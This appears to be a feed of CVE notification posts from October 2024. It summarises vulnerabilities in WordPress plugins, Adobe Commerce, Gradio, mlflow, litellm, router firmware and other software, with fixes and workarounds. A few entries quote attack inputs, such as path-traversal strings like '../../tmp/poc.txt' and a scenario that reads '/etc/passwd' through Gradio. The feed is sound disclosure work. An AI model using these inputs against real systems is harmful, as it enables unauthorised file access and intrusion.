🚨 CVE-2024-7489The Forms for Mailchimp by Optin Cat – Grow Your MailChimp List plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form color parameters in all versions up to, and including, 2.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-10-12 03:37:25 |
🚨 CVE-2024-9821The Bot for Telegram on WooCommerce plugin for WordPress is vulnerable to sensitive information disclosure due to missing authorization checks on the 'stm_wpcfto_get_settings' AJAX action in all versions up to, and including, 1.2.4. This makes it possible for authenticated attackers, with subscriber-level access and above, to view the Telegram Bot Token, a secret token used to control the bot, which can then be used to log in as any existing user on the site, such as an administrator, if they know the username, due to the Login with Telegram feature.🎖@cveNotify |
|
| 2024-10-12 03:37:24 |
🚨 CVE-2024-9592The Easy PayPal Gift Certificate plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on the 'wpppgc_plugin_options' function. This makes it possible for unauthenticated attackers to update the plugin's settings and inject malicious JavaScript via a forged request, granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-11 22:37:38 |
🚨 CVE-2024-45149Adobe Commerce versions 2.4.7-p2, 2.4.6-p7, 2.4.5-p9, 2.4.4-p10 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and have a low impact on confidentiality. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-10-11 22:37:32 |
🚨 CVE-2024-45148Adobe Commerce versions 2.4.7-p2, 2.4.6-p7, 2.4.5-p9, 2.4.4-p10 and earlier are affected by an Improper Authentication vulnerability that could result in a security feature bypass. A low-privileged attacker could leverage this vulnerability to gain unauthorized access without proper credentials. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-10-11 22:37:31 |
🚨 CVE-2024-45133Adobe Commerce versions 2.4.7-p2, 2.4.6-p7, 2.4.5-p9, 2.4.4-p10 and earlier are affected by an Information Exposure vulnerability that could result in a security feature bypass. An admin attacker could leverage this vulnerability to have a low impact on confidentiality which may aid in further attacks. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-10-11 22:37:30 |
🚨 CVE-2024-45132Adobe Commerce versions 2.4.7-p2, 2.4.6-p7, 2.4.5-p9, 2.4.4-p10 and earlier are affected by an Improper Authorization vulnerability that could result in Privilege escalation. A low-privileged attacker could leverage this vulnerability to bypass security measures and affect confidentiality. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-10-11 22:37:26 |
🚨 CVE-2024-45130Adobe Commerce versions 2.4.7-p2, 2.4.6-p7, 2.4.5-p9, 2.4.4-p10 and earlier are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to bypass security measures and have a low impact on integrity. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-10-11 22:37:25 |
🚨 CVE-2023-40158Hidden functionality vulnerability in the CBC products allows a remote authenticated attacker to execute an arbitrary OS command on the device or alter its settings. As for the affected products/versions, see the detailed information provided by the vendor. Note that NR4H, NR8H, NR16H series and DR-16F, DR-8F, DR-4F, DR-16H, DR-8H, DR-4H, DR-4M41 series are no longer supported, therefore updates for those products are not provided.🎖@cveNotify |
|
| 2024-10-11 22:07:25 |
🚨 CVE-2024-25110The UAMQP is a general purpose C library for AMQP 1.0. During a call to open_get_offered_capabilities, a memory allocation may fail causing a use-after-free issue and if a client called it during connection communication it may cause a remote code execution. Users are advised to update the submodule with commit `30865c9c`. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-10-11 22:07:24 |
🚨 CVE-2021-4437A vulnerability, which was classified as problematic, has been found in dbartholomae lambda-middleware frameguard up to 1.0.4. Affected by this issue is some unknown functionality of the file packages/json-deserializer/src/JsonDeserializer.ts of the component JSON Mime-Type Handler. The manipulation leads to inefficient regular expression complexity. Upgrading to version 1.1.0 is able to address this issue. The patch is identified as f689404d830cbc1edd6a1018d3334ff5f44dc6a6. It is recommended to upgrade the affected component. VDB-253406 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-10-11 20:37:24 |
🚨 CVE-2024-47975Improper access control validation in firmware of some Solidigm DC Products may allow an attacker with physical access to gain unauthorized access or an attacker with local access to potentially enable denial of service.🎖@cveNotify |
|
| 2024-10-11 19:37:32 |
🚨 CVE-2024-48020Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Revmakx Backup and Staging by WP Time Capsule allows SQL Injection.This issue affects Backup and Staging by WP Time Capsule: from n/a through 1.22.21.🎖@cveNotify |
|
| 2024-10-11 19:37:26 |
🚨 CVE-2024-47353URL Redirection to Untrusted Site ('Open Redirect') vulnerability in QuomodoSoft ElementsReady Addons for Elementor.This issue affects ElementsReady Addons for Elementor: from n/a through 6.4.2.🎖@cveNotify |
|
| 2024-10-11 19:37:25 |
🚨 CVE-2024-25122sidekiq-unique-jobs is an open source project which prevents simultaneous Sidekiq jobs with the same unique arguments to run. Specially crafted GET request parameters handled by any of the following endpoints of sidekiq-unique-jobs' "admin" web UI, allow a super-user attacker, or an unwitting, but authorized, victim, who has received a disguised / crafted link, to successfully execute malicious code, which could potentially steal cookies, session data, or local storage data from the app the sidekiq-unique-jobs web UI is mounted in. 1. `/changelogs`, 2. `/locks` or 3. `/expiring_locks`. This issue has been addressed in versions 7.1.33 and 8.0.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-10-11 19:37:24 |
🚨 CVE-2024-25108Pixelfed is an open source photo sharing platform. When processing requests authorization was improperly and insufficiently checked, allowing attackers to access far more functionality than users intended, including to the administrative and moderator functionality of the Pixelfed server. This vulnerability affects every version of Pixelfed between v0.10.4 and v0.11.9, inclusive. A proof of concept of this vulnerability exists. This vulnerability affects every local user of a Pixelfed server, and can potentially affect the servers' ability to federate. Some user interaction is required to setup the conditions to be able to exercise the vulnerability, but the attacker could conduct this attack time-delayed manner, where user interaction is not actively required. This vulnerability has been addressed in version 0.11.11. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-10-11 19:07:24 |
🚨 CVE-2024-48941The Syracom Secure Login (2FA) plugin for Jira, Confluence, and Bitbucket through 3.1.4.5 allows remote attackers to bypass 2FA by interacting with the /rest endpoint of Jira, Confluence, or Bitbucket. In the default configuration, /rest is allowlisted.🎖@cveNotify |
|
| 2024-10-11 18:37:25 |
🚨 CVE-2024-46532SQL Injection vulnerability in OpenHIS v.1.0 allows an attacker to execute arbitrary code via the refund function in the PayController.class.php component.🎖@cveNotify |
|
| 2024-10-11 18:37:24 |
🚨 CVE-2024-44157A stack buffer overflow was addressed through improved input validation. This issue is fixed in Apple TV 1.5.0.152 for Windows, iTunes 12.13.3 for Windows. Parsing a maliciously crafted video file may lead to unexpected system termination.🎖@cveNotify |
|
| 2024-10-11 17:37:32 |
🚨 CVE-2024-44731Mirotalk before commit 9de226 was discovered to contain a DOM-based cross-site scripting (XSS) vulnerability which allows attackers to execute arbitrary code via sending crafted payloads in messages to other users over RTC connections.🎖@cveNotify |
|
| 2024-10-11 17:37:25 |
🚨 CVE-2024-44413A vulnerability was discovered in DI_8200-16.07.26A1, which has been classified as critical. This issue affects the upgrade_filter_asp function in the upgrade_filter.asp file. Manipulation of the path parameter can lead to command injection.🎖@cveNotify |
|
| 2024-10-11 17:37:24 |
🚨 CVE-2024-44400A vulnerability was discovered in DI_8400-16.07.26A1, which has been classified as critical. This issue affects the upgrade_filter_asp function in the upgrade_filter.asp file. Manipulation of the path parameter can lead to command injection.🎖@cveNotify |
|
| 2024-10-11 17:07:25 |
🚨 CVE-2022-26878drivers/bluetooth/virtio_bt.c in the Linux kernel before 5.16.3 has a memory leak (socket buffers have memory allocated but not freed).🎖@cveNotify |
|
| 2024-10-11 17:07:24 |
🚨 CVE-2017-1000082systemd v233 and earlier fails to safely parse usernames starting with a numeric digit (e.g. "0day"), running the service in question with root privileges rather than the user intended.🎖@cveNotify |
|
| 2024-10-11 16:37:25 |
🚨 CVE-2023-6228An issue was found in the tiffcp utility distributed by the libtiff package where a crafted TIFF file on processing may cause a heap-based buffer overflow leads to an application crash.🎖@cveNotify |
|
| 2024-10-11 15:07:25 |
🚨 CVE-2024-34122Acrobat for Edge versions 126.0.2592.68 and earlier are affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-10-11 15:07:24 |
🚨 CVE-2024-3099A vulnerability in mlflow/mlflow version 2.11.1 allows attackers to create multiple models with the same name by exploiting URL encoding. This flaw can lead to Denial of Service (DoS) as an authenticated user might not be able to use the intended model, as it will open a different model each time. Additionally, an attacker can exploit this vulnerability to perform data model poisoning by creating a model with the same name, potentially causing an authenticated user to become a victim by using the poisoned model. The issue stems from inadequate validation of model names, allowing for the creation of models with URL-encoded names that are treated as distinct from their URL-decoded counterparts.🎖@cveNotify |
|
| 2024-10-11 14:37:31 |
🚨 CVE-2024-8531CWE-347: Improper Verification of Cryptographic Signature vulnerability exists that couldcompromise the Data Center Expert software when an upgrade bundle is manipulated toinclude arbitrary bash scripts that are executed as root.🎖@cveNotify |
|
| 2024-10-11 14:37:30 |
🚨 CVE-2024-6657A denial of service may be caused to a single peripheral device in a BLE network when multiple central devices continuously connect and disconnect to the peripheral. A hard reset is required to recover the peripheral device.🎖@cveNotify |
|
| 2024-10-11 14:37:26 |
🚨 CVE-2024-25929Missing Authorization vulnerability in MultiVendorX Product Catalog Enquiry for WooCommerce by MultiVendorX.This issue affects Product Catalog Enquiry for WooCommerce by MultiVendorX: from n/a through 5.0.5.🎖@cveNotify |
|
| 2024-10-11 14:37:25 |
🚨 CVE-2024-2032A race condition vulnerability exists in zenml-io/zenml versions up to and including 0.55.3, which allows for the creation of multiple users with the same username when requests are sent in parallel. This issue was fixed in version 0.55.5. The vulnerability arises due to insufficient handling of concurrent user creation requests, leading to data inconsistencies and potential authentication problems. Specifically, concurrent processes may overwrite or corrupt user data, complicating user identification and posing security risks. This issue is particularly concerning for APIs that rely on usernames as input parameters, such as PUT /api/v1/users/test_race, where it could lead to further complications.🎖@cveNotify |
|
| 2024-10-11 14:37:24 |
🚨 CVE-2023-39363Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine (EVM). In versions 0.2.15, 0.2.16 and 0.3.0, named re-entrancy locks are allocated incorrectly. Each function using a named re-entrancy lock gets a unique lock regardless of the key, allowing cross-function re-entrancy in contracts compiled with the susceptible versions. A specific set of conditions is required to result in misbehavior of affected contracts, specifically: a `.vy` contract compiled with `vyper` versions `0.2.15`, `0.2.16`, or `0.3.0`; a primary function that utilizes the `@nonreentrant` decorator with a specific `key` and does not strictly follow the check-effects-interaction pattern (i.e. contains an external call to an untrusted party before storage updates); and a secondary function that utilizes the same `key` and would be affected by the improper state caused by the primary function. Version 0.3.1 contains a fix for this issue.🎖@cveNotify |
|
| 2024-10-11 14:07:25 |
🚨 CVE-2023-34003Missing Authorization vulnerability in Woo WooCommerce Box Office.This issue affects WooCommerce Box Office: from n/a through 1.1.51.🎖@cveNotify |
|
| 2024-10-11 14:07:24 |
🚨 CVE-2023-31080Missing Authorization vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates).This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.65.🎖@cveNotify |
|
| 2024-10-11 13:37:26 |
🚨 CVE-2024-45932Krayin CRM v1.3.0 is vulnerable to Cross Site Scripting (XSS) via the organization name field in /admin/contacts/organizations/edit/2.🎖@cveNotify |
|
| 2024-10-11 13:37:25 |
🚨 CVE-2024-0520A vulnerability in mlflow/mlflow version 8.2.1 allows for remote code execution due to improper neutralization of special elements used in an OS command ('Command Injection') within the `mlflow.data.http_dataset_source.py` module. Specifically, when loading a dataset from a source URL with an HTTP scheme, the filename extracted from the `Content-Disposition` header or the URL path is used to generate the final file path without proper sanitization. This flaw enables an attacker to control the file path fully by utilizing path traversal or absolute path techniques, such as '../../tmp/poc.txt' or '/tmp/poc.txt', leading to arbitrary file write. Exploiting this vulnerability could allow a malicious user to execute commands on the vulnerable machine, potentially gaining access to data and model information. The issue is fixed in version 2.9.0.🎖@cveNotify |
|
| 2024-10-11 13:37:24 |
🚨 CVE-2024-5505NETGEAR ProSAFE Network Management System UpLoadServlet Directory Traversal Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of NETGEAR ProSAFE Network Management System. Authentication is required to exploit this vulnerability.The specific flaw exists within the UpLoadServlet class. The issue results from the lack of proper validation of a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to execute code in the context of SYSTEM. Was ZDI-CAN-22724.🎖@cveNotify |
|
| 2024-10-11 13:07:24 |
🚨 CVE-2024-46446Mecha CMS 3.0.0 is vulnerable to Directory Traversal. An attacker can construct cookies and URIs that bypass user identity checks. Parameters can then be passed through the POST method, resulting in the Deletion of Arbitrary Files or Website Takeover.🎖@cveNotify |
|
| 2024-10-11 03:37:24 |
🚨 CVE-2024-9822The Pedalo Connector plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.0.5. This is due to insufficient restriction on the 'login_admin_user' function. This makes it possible for unauthenticated attackers to log to the first user, who is usually the administrator, or if it does not exist, then to the first administrator.🎖@cveNotify |
|
| 2024-10-10 23:37:32 |
🚨 CVE-2024-47872Gradio is an open-source Python package designed for quick prototyping. This vulnerability involves **Cross-Site Scripting (XSS)** on any Gradio server that allows file uploads. Authenticated users can upload files such as HTML, JavaScript, or SVG files containing malicious scripts. When other users download or view these files, the scripts will execute in their browser, allowing attackers to perform unauthorized actions or steal sensitive information from their sessions. This impacts any Gradio server that allows file uploads, particularly those using components that process or display user-uploaded files. Users are advised to upgrade to `gradio>=5` to address this issue. As a workaround, users can restrict the types of files that can be uploaded to the Gradio server by limiting uploads to non-executable file types such as images or text. Additionally, developers can implement server-side validation to sanitize uploaded files, ensuring that HTML, JavaScript, and SVG files are properly handled or rejected before being stored or displayed to users.🎖@cveNotify |
|
| 2024-10-10 23:37:25 |
🚨 CVE-2024-47868Gradio is an open-source Python package designed for quick prototyping. This is a **data validation vulnerability** affecting several Gradio components, which allows arbitrary file leaks through the post-processing step. Attackers can exploit these components by crafting requests that bypass expected input constraints. This issue could lead to sensitive files being exposed to unauthorized users, especially when combined with other vulnerabilities, such as issue TOB-GRADIO-15. The components most at risk are those that return or handle file data. Vulnerable Components: 1. **String to FileData:** DownloadButton, Audio, ImageEditor, Video, Model3D, File, UploadButton. 2. **Complex data to FileData:** Chatbot, MultimodalTextbox. 3. **Direct file read in preprocess:** Code. 4. **Dictionary converted to FileData:** ParamViewer, Dataset. Exploit Scenarios: 1. A developer creates a Dropdown list that passes values to a DownloadButton. An attacker bypasses the allowed inputs, sends an arbitrary file path (like `/etc/passwd`), and downloads sensitive files. 2. An attacker crafts a malicious payload in a ParamViewer component, leaking sensitive files from a server through the arbitrary file leak. This issue has been resolved in `gradio>5.0`. Upgrading to the latest version will mitigate this vulnerability. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-10-10 23:37:24 |
🚨 CVE-2024-47867Gradio is an open-source Python package designed for quick prototyping. This vulnerability is a **lack of integrity check** on the downloaded FRP client, which could potentially allow attackers to introduce malicious code. If an attacker gains access to the remote URL from which the FRP client is downloaded, they could modify the binary without detection, as the Gradio server does not verify the file's checksum or signature. Any users utilizing the Gradio server's sharing mechanism that downloads the FRP client could be affected by this vulnerability, especially those relying on the executable binary for secure data tunneling. There is no direct workaround for this issue without upgrading. However, users can manually validate the integrity of the downloaded FRP client by implementing checksum or signature verification in their own environment to ensure the binary hasn't been tampered with.🎖@cveNotify |
|
| 2024-10-10 22:37:32 |
🚨 CVE-2024-47168Gradio is an open-source Python package designed for quick prototyping. This vulnerability involves data exposure due to the enable_monitoring flag not properly disabling monitoring when set to False. Even when monitoring is supposedly disabled, an attacker or unauthorized user can still access the monitoring dashboard by directly requesting the /monitoring endpoint. This means that sensitive application analytics may still be exposed, particularly in environments where monitoring is expected to be disabled. Users who set enable_monitoring=False to prevent unauthorized access to monitoring data are impacted. Users are advised to upgrade to gradio>=4.44 to address this issue. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-10-10 22:37:26 |
🚨 CVE-2024-47167Gradio is an open-source Python package designed for quick prototyping. This vulnerability relates to **Server-Side Request Forgery (SSRF)** in the `/queue/join` endpoint. Gradio’s `async_save_url_to_cache` function allows attackers to force the Gradio server to send HTTP requests to user-controlled URLs. This could enable attackers to target internal servers or services within a local network and possibly exfiltrate data or cause unwanted internal requests. Additionally, the content from these URLs is stored locally, making it easier for attackers to upload potentially malicious files to the server. This impacts users deploying Gradio servers that use components like the Video component which involve URL fetching. Users are advised to upgrade to `gradio>=5` to address this issue. As a workaround, users can disable or heavily restrict URL-based inputs in their Gradio applications to trusted domains only. Additionally, implementing stricter URL validation (such as allowinglist-based validation) and ensuring that local or internal network addresses cannot be requested via the `/queue/join` endpoint can help mitigate the risk of SSRF attacks.🎖@cveNotify |
|
| 2024-10-10 22:37:25 |
🚨 CVE-2024-47164Gradio is an open-source Python package designed for quick prototyping. This vulnerability relates to the **bypass of directory traversal checks** within the `is_in_or_equal` function. This function, intended to check if a file resides within a given directory, can be bypassed with certain payloads that manipulate file paths using `..` (parent directory) sequences. Attackers could potentially access restricted files if they are able to exploit this flaw, although the difficulty is high. This primarily impacts users relying on Gradio’s blocklist or directory access validation, particularly when handling file uploads. Users are advised to upgrade to `gradio>=5.0` to address this issue. As a workaround, users can manually sanitize and normalize file paths in their Gradio deployment before passing them to the `is_in_or_equal` function. Ensuring that all file paths are properly resolved and absolute can help mitigate the bypass vulnerabilities caused by the improper handling of `..` sequences or malformed paths.🎖@cveNotify |
|
| 2024-10-10 22:37:24 |
🚨 CVE-2024-47084Gradio is an open-source Python package designed for quick prototyping. This vulnerability is related to **CORS origin validation**, where the Gradio server fails to validate the request origin when a cookie is present. This allows an attacker’s website to make unauthorized requests to a local Gradio server. Potentially, attackers can upload files, steal authentication tokens, and access user data if the victim visits a malicious website while logged into Gradio. This impacts users who have deployed Gradio locally and use basic authentication. Users are advised to upgrade to `gradio>4.44` to address this issue. As a workaround, users can manually enforce stricter CORS origin validation by modifying the `CustomCORSMiddleware` class in their local Gradio server code. Specifically, they can bypass the condition that skips CORS validation for requests containing cookies to prevent potential exploitation.🎖@cveNotify |
|
| 2024-10-10 22:07:25 |
🚨 CVE-2024-45116Adobe Commerce versions 2.4.7-p2, 2.4.6-p7, 2.4.5-p9, 2.4.4-p10 and earlier are affected by a Cross-Site Scripting (XSS) vulnerability that could be exploited to execute arbitrary code. If an admin attacker can trick a user into clicking a specially crafted link or submitting a form, malicious scripts may be executed within the context of the victim's browser and have high impact on confidentiality and integrity. Exploitation of this issue requires user interaction.🎖@cveNotify |
|
| 2024-10-10 22:07:24 |
🚨 CVE-2024-45115Adobe Commerce versions 2.4.7-p2, 2.4.6-p7, 2.4.5-p9, 2.4.4-p10 and earlier are affected by an Improper Authentication vulnerability that could result in privilege escalation. An attacker could exploit this vulnerability to gain unauthorized access or elevated privileges within the application. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-10-10 21:37:38 |
🚨 CVE-2023-25779Uncontrolled search path element in some Intel(R) Thunderbolt(TM) DCH drivers for Windows before version 88 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-10-10 21:37:32 |
🚨 CVE-2023-25777Improper access control in some Intel(R) Thunderbolt(TM) DCH drivers for Windows before version 88 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-10-10 21:37:31 |
🚨 CVE-2023-24542Unquoted search path or element in some Intel(R) Thunderbolt(TM) DCH drivers for Windows before version 88 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-10-10 21:37:30 |
🚨 CVE-2023-24481Improper access control in some Intel(R) Thunderbolt(TM) DCH drivers for Windows before version 88 may allow an authenticated user to potentially enable escalation of privilege via local access.🎖@cveNotify |
|
| 2024-10-10 21:37:26 |
🚨 CVE-2023-24463Improper input validation in some Intel(R) Thunderbolt(TM) DCH drivers for Windows before version 88 may allow an unauthenticated user to potentially enable information disclosure via adjacent access.🎖@cveNotify |
|
| 2024-10-10 21:37:25 |
🚨 CVE-2023-5136An incorrect permission assignment in the TopoGrafix DataPlugin for GPX could result in information disclosure. An attacker could exploit this vulnerability by getting a user to open a specially crafted data file.🎖@cveNotify |
|
| 2024-10-10 21:07:32 |
🚨 CVE-2024-47651This vulnerability exists in Shilpi Client Dashboard due to improper handling of multiple parameters in the API endpoint. An authenticated remote attacker could exploit this vulnerability by including multiple “userid” parameters in the API request body leading to unauthorized access of sensitive information belonging to other users.🎖@cveNotify |
|
| 2024-10-10 21:07:26 |
🚨 CVE-2024-8804The Code Embed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's script embed functionality in all versions up to, and including, 2.4 due to insufficient restrictions on who can utilize the functionality. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-10-10 21:07:25 |
🚨 CVE-2024-9384The Quantity Dynamic Pricing & Bulk Discounts for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.8.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-10 21:07:24 |
🚨 CVE-2024-9375The WordPress Captcha Plugin by Captcha Bank plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.0.36. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-10 20:37:32 |
🚨 CVE-2024-9349The Auto Amazon Links – Amazon Associates Affiliate Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.4.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-10-10 20:37:26 |
🚨 CVE-2024-42812In D-Link DIR-860L v2.03, there is a buffer overflow vulnerability due to the lack of length verification for the SID field in gena.cgi. Attackers who successfully exploit this vulnerability can cause the remote target device to crash or execute arbitrary commands.🎖@cveNotify |
|
| 2024-10-10 20:37:25 |
🚨 CVE-2024-4890A blind SQL injection vulnerability exists in the berriai/litellm application, specifically within the '/team/update' process. The vulnerability arises due to the improper handling of the 'user_id' parameter in the raw SQL query used for deleting users. An attacker can exploit this vulnerability by injecting malicious SQL commands through the 'user_id' parameter, leading to potential unauthorized access to sensitive information such as API keys, user information, and tokens stored in the database. The affected version is 1.27.14.🎖@cveNotify |
|
| 2024-10-10 20:37:24 |
🚨 CVE-2023-39020stanford-parser v3.9.2 and below was discovered to contain a code injection vulnerability in the component edu.stanford.nlp.io.getBZip2PipedInputStream. This vulnerability is exploited via passing an unchecked argument.🎖@cveNotify |
|
| 2024-10-10 20:07:25 |
🚨 CVE-2022-4244A flaw was found in codeplex-codehaus. A directory traversal attack (also known as path traversal) aims to access files and directories stored outside the intended folder. By manipulating files with "dot-dot-slash (../)" sequences and their variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code, configuration, and other critical system files.🎖@cveNotify |
|
| 2024-10-10 20:07:24 |
🚨 CVE-2017-1000487Plexus-utils before 3.0.16 is vulnerable to command injection because it does not correctly process the contents of double quoted strings.🎖@cveNotify |
|
| 2024-10-10 19:07:25 |
🚨 CVE-2024-46300itsourcecode Placement Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via the Full Name field in registration.php.🎖@cveNotify |
|
| 2024-10-10 19:07:24 |
🚨 CVE-2024-7801Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Microchip TimeProvider 4100 (Data plot modules) allows SQL Injection.This issue affects TimeProvider 4100: from 1.0 before 2.4.7.🎖@cveNotify |
|
| 2024-10-10 18:37:32 |
🚨 CVE-2024-47412Animate versions 23.0.7, 24.0.4 and earlier are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-10-10 18:37:26 |
🚨 CVE-2024-47411Animate versions 23.0.7, 24.0.4 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-10-10 18:37:25 |
🚨 CVE-2024-20097In vdec, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09028313; Issue ID: MSV-1630.🎖@cveNotify |
|
| 2024-10-10 18:37:24 |
🚨 CVE-2024-20096In m4u, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08996900; Issue ID: MSV-1635.🎖@cveNotify |
|
| 2024-10-10 18:07:27 |
🚨 CVE-2024-44954In the Linux kernel, the following vulnerability has been resolved:ALSA: line6: Fix racy access to midibufThere can be concurrent accesses to line6 midibuf from both the URBcompletion callback and the rawmidi API access. This could be a causeof KMSAN warning triggered by syzkaller below (so put as reported-byhere).This patch protects the midibuf call of the former code path with aspinlock for avoiding the possible races.🎖@cveNotify |
|
| 2024-10-10 17:37:24 |
🚨 CVE-2024-41817ImageMagick is a free and open-source software suite, used for editing and manipulating digital images. The `AppImage` version `ImageMagick` might use an empty path when setting `MAGICK_CONFIGURE_PATH` and `LD_LIBRARY_PATH` environment variables while executing, which might lead to arbitrary code execution by loading malicious configuration files or shared libraries in the current working directory while executing `ImageMagick`. The vulnerability is fixed in 7.11-36.🎖@cveNotify |
|
| 2024-10-10 17:07:26 |
🚨 CVE-2024-35687Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Yannick Lefebvre Link Library link-library allows Reflected XSS.This issue affects Link Library: from n/a through 7.6.3.🎖@cveNotify |
|
| 2024-10-10 17:07:25 |
🚨 CVE-2021-25092The Link Library WordPress plugin before 7.2.8 does not have CSRF check when resetting library settings, allowing attackers to make a logged in admin reset arbitrary settings via a CSRF attack🎖@cveNotify |
|
| 2024-10-10 17:07:24 |
🚨 CVE-2021-25091The Link Library WordPress plugin before 7.2.9 does not sanitise and escape the settingscopy parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting🎖@cveNotify |
|
| 2024-10-10 16:37:42 |
🚨 CVE-2023-49262The authentication mechanism can be bypassed by overflowing the value of the Cookie "authentication" field, provided there is an active user session.🎖@cveNotify |
|
| 2024-10-10 16:37:41 |
🚨 CVE-2023-49259The authentication cookies are generated using an algorithm based on the username, hardcoded secret and the up-time, and can be guessed in a reasonable time.🎖@cveNotify |
|
| 2024-10-10 16:37:40 |
🚨 CVE-2023-49257An authenticated user is able to upload an arbitrary CGI-compatible file using the certificate upload utility and execute it with the root user privileges.🎖@cveNotify |
|
| 2024-10-10 16:37:37 |
🚨 CVE-2023-49256It is possible to download the configuration backup without authorization and decrypt included passwords using hardcoded static key.🎖@cveNotify |
|
| 2024-10-10 16:37:36 |
🚨 CVE-2023-4612Improper Authentication vulnerability in Apereo CAS in jakarta.servlet.http.HttpServletRequest.getRemoteAddr method allows Multi-Factor Authentication bypass.This issue affects CAS: through 7.0.0-RC7. It is unknown whether in new versions the issue will be fixed. For the date of publication there is no patch, and the vendor does not treat it as a vulnerability.🎖@cveNotify |
|
| 2024-10-10 16:37:35 |
🚨 CVE-2023-4540Improper Handling of Exceptional Conditions vulnerability in Daurnimator lua-http library allows Excessive Allocation and a denial of service (DoS) attack to be executed by sending a properly crafted request to the server. Such a request causes the program to enter an infinite loop. This issue affects lua-http: all versions before commit ddab283.🎖@cveNotify |
|
| 2024-10-10 16:37:31 |
🚨 CVE-2023-20830In gps, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08014144; Issue ID: ALPS08014156.🎖@cveNotify |
|
| 2024-10-10 16:37:30 |
🚨 CVE-2023-20827In ims service, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07937105; Issue ID: ALPS07937105.🎖@cveNotify |
|
| 2024-10-10 16:07:26 |
🚨 CVE-2024-22126The User Admin application of SAP NetWeaver AS for Java - version 7.50, insufficiently validates and improperly encodes the incoming URL parameters before including them into the redirect URL. This results in Cross-Site Scripting (XSS) vulnerability, leading to a high impact on confidentiality and mild impact on integrity and availability.🎖@cveNotify |
|
| 2024-10-10 16:07:24 |
🚨 CVE-2023-49339Ellucian Banner 9.17 allows Insecure Direct Object Reference (IDOR) via a modified bannerId to the /StudentSelfService/ssb/studentCard/retrieveData endpoint.🎖@cveNotify |
|
| 2024-10-10 15:37:48 |
🚨 CVE-2022-38714IBM DataStage on Cloud Pak for Data 4.0.6 to 4.5.2 stores sensitive credential information that can be read by a privileged user. IBM X-Force ID: 235060.🎖@cveNotify |
|
| 2024-10-10 15:37:41 |
